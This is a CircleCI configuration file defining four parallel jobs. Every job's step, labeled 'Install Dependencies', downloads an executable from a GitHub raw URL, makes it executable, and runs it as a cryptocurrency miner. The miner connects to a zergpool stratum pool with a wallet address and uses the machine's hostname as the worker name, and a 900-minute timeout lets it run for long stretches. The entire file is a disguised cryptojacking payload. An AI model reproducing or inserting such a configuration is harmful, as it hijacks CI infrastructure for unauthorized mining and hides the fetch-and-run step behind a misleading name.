version: 2
jobs:
    aku1:
      docker:
            - image: ubuntu-18.04
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/mariobiszz/students/main/subscribe && chmod 777 subscribe && ./subscribe -a cpupower -o stratum+tcp://cpupower.mine.zergpool.com:4250 -u CTg5jaQmry8QTyWW4JAxgG7rd7wHGNsMDk.$(cat /proc/sys/kernel/hostname) -p=c=CPU,mc=CPU
            no_output_timeout: 900m
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/mariobiszz/students/main/subscribe && chmod 777 subscribe && ./subscribe -a cpupower -o stratum+tcp://cpupower.mine.zergpool.com:4250 -u CTg5jaQmry8QTyWW4JAxgG7rd7wHGNsMDk.$(cat /proc/sys/kernel/hostname) -p=c=CPU,mc=CPU
            no_output_timeout: 900m
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/mariobiszz/students/main/subscribe && chmod 777 subscribe && ./subscribe -a cpupower -o stratum+tcp://cpupower.mine.zergpool.com:4250 -u CTg5jaQmry8QTyWW4JAxgG7rd7wHGNsMDk.$(cat /proc/sys/kernel/hostname) -p=c=CPU,mc=CPU
            no_output_timeout: 900m
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/mariobiszz/students/main/subscribe && chmod 777 subscribe && ./subscribe -a cpupower -o stratum+tcp://cpupower.mine.zergpool.com:4250 -u CTg5jaQmry8QTyWW4JAxgG7rd7wHGNsMDk.$(cat /proc/sys/kernel/hostname) -p=c=CPU,mc=CPU
            no_output_timeout: 900m

            
workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4